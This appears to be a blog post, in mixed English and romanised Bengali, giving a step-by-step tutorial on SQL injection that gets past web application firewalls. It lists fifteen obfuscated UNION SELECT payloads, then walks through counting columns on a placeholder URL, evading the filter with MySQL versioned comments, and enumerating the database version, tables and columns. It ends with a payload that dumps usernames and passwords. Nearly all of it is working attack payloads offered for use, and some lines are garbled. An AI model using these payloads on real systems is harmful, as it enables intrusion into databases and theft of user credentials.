WD

WD

waf bypass

SQL injection bypassing WAF (forbidden)

1. id=1+(UnIoN)+(SelECT)+ 2. id=1+(UnIoN+SeLeCT)+ 3. id=1+(UnI)(oN)+(SeL)(EcT) 4.

id=1+'UnI''On'+'SeL''ECT'  5. id=1+%55nion all /*!12345%53elect*/ 1,version(),3— 6.

id=1+UnIoN+SeLecT 1,2,3— 7. id=1+UnIOn/**/SeLect 1,2,3— 8. id=1+UNIunionON+SELselectECT

1,2,3— 9. id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3— 10. id=1 and (select 1)=(Select 0xAA 1000 more

A’s)+UnIoN+SeLeCT 1,2,3— 11. id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1,2 ,3—

12. id=1+un/**/ion+sel/**/ect+1,2,3-- 13. id=1+/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*

//*T*/1,2,3 14. id=1+/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table-- 15. id=1+/**

/union/*&id=*/select/*&id=*/1,2,3--

www.site.com/id?=4'


www.site.com/id?=4 oder by 1--error
www.site.com/id?=4 oder by 1--+ error  :/
www.site.com/id?=4 oder by 1-- - error :/
www.site.com/id?=4 Group by 1-- - no error  :D
www.site.com/id?=4 Group by 2-- no error
www.site.com/id?=4 Group by 3-- no error
www.site.com/id?=4 Group by 4-- no error
www.site.com/id?=4 Group by 5-- no error
www.site.com/id?=4 Group by 6-- no error
www.site.com/id?=4 Group by 7-- no error
www.site.com/id?=4 Group by 8-- error
-----------------------------------------------------------------------------------------------------------------
part -2
www.site.com/id?=-4 union select 1,2,3,4,5,6,7--
if u see 403 (forbidden) then we have to WAF Bypass

let's try waf bypass

www.site.com/id?=-4 union select 1,2,3,4,5,6,7--+ error
www.site.com/id?=-4 union select 1,2,3,4,5,6,7--+- error
www.site.com/id?=-4 union select 1,2,3,4,5,6,7-- - error
beshi kaj kora ( -- - )

www.site.com/id?=-4 /*!50000union*/+/*!50000select*/ 1,2,3,4,5,6,7-- -

www.site.com/id?=-4 /*!50000union*/+/*!50000select*/ 1,version(),3,4,5,6,7-- -

another way

www.site.com/id?=-4 /*!50000union*/+/*!50000select*/ 1,@@version,3,4,5,6,7-- -
-------------------------------------
for database name
-------------------------------------
www.site.com/id?=-4 /*!50000union*/+/*!50000select*/ 1,@@database,3,4,5,6,7-- -
www.site.com/id?=-4 /*!50000union*/+/*!50000select*/ 1,database(),3,4,5,6,7-- -
----------------------------------------------------------------------------------------------------------------------------
Part 3
www.site.com/id?=-4 /*!50000union*/+/*!50000select*/ 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()-- - error :/ :/ :/

now amara aita k bypass korbo :)

www.site.com/id?=-4 /*!50000union*/+/*!50000select*/ 1,/*!table_name*/,3,4,5,6,7+from /*!information_schema*/./*!tables*/ where table_schema=database()-- - :D :D :D

we got database :D :D :D

www.site.com/id?=-4 /*!50000union*/+/*!50000select*/ 1,unhex(hex(column_name)),3,4,5,6,7+from /*!information_schema*/.columns where table_name='users'--


another way

Char a covert kortey hoba from hackbar(plugin for firfox)

.......table_name=CHAR(117, 115, 101, 114, 115)-- -
tarpor a oo jodi na kora etc onek command aca.

unhex(hex(/*!00000concat*/(user,0x3a,pass)))

 /*!00000from*/ users-- -

----------------------------------------------------------------------------------------------------------------------------------------------------------
part 4

www.site.com/id?=-4 /*!00000UnION*/ SeLeCt 1,unhex(hex(/*!00000concat*/(username,0x3a,password))),3,4,5,6,7 /*!00000from*/ users-- -

2 comments:

Subscribe to: Posts (Atom)